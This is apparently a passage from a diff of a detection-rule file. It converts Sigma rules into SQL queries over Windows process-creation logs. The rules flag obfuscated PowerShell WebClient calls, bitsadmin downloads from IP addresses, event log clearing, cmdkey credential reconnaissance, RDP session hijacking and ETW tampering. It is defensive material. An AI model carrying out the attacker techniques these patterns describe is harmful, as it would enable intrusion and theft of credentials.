'%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR 
CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE 
'%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + 
"attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": 
"proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", - "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "status": "test", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { "title": "Potential Windows Defender Tampering Via Wmic.EXE", 
@@ -7508,765 +7293,738 @@ "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE 
'%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. 
This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "Legitimate software creating script event consumers" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + }, + { + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1543.003" + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' 
OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. 
backup or forensic investigation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "description": "Detects the use of SDelete to erase a file not the free space", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR 
CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR 
CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", - "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Administrative script libraries" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR 
CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", "attack.persistence", - "attack.privilege_escalation" + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID 